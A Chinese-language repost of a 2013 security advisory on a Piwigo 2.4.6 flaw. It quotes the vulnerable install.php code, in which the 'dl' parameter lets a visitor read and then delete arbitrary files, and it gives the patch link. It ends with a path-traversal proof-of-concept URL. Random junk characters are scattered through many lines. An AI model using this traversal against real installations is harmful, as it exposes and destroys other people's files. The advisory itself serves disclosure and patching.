Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。

9 D2 W" r! f  N6 l+ APiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
====================================================================
/install.php:
-------------
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
6 Z; l& l. \3 ]. s2 r7 K114: {
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
( v* e) k6 {" V$ S116:   header('Cache-Control: no-cache, must-revalidate');
9 R4 |6 [7 h5 y1 r( ~117:   header('Pragma: no-cache');
( g9 q/ y% S; Z0 F1 f$ n! f5 F118:   header('Content-Disposition: attachment; filename="database.inc.php"');
, c- M' g+ ^  S; y119:   header('Content-Transfer-Encoding: binary');
120:   header('Content-Length: '.filesize($filename));
121:   echo file_get_contents($filename);
" N! u, V4 F  w+ Z6 y/ u122:   unlink($filename);
8 _# {9 F: b7 V6 E123:   exit();
0 ~: f$ l2 g- J# _# E! V6 Y124: }
+ K* E: I0 v/ R+ o====================================================================

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
3 p) r' R; {' g% x  g           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
* A/ B! U: n# y0 A4 n% g7 ~* e! M                            @zeroscience
, ]/ [, N! G3 d  x1 e9 h  ^8 G
Advisory ID: ZSL-2013-5127
4 p9 k  o  [5 ]4 b7 VAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
/ |+ q/ I0 x$ \! r3 G% y6 ^3 e
15.02.2013

: J, @+ _. @" N5 f; R- B' `--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
* F5 u8 f, r( c; @# e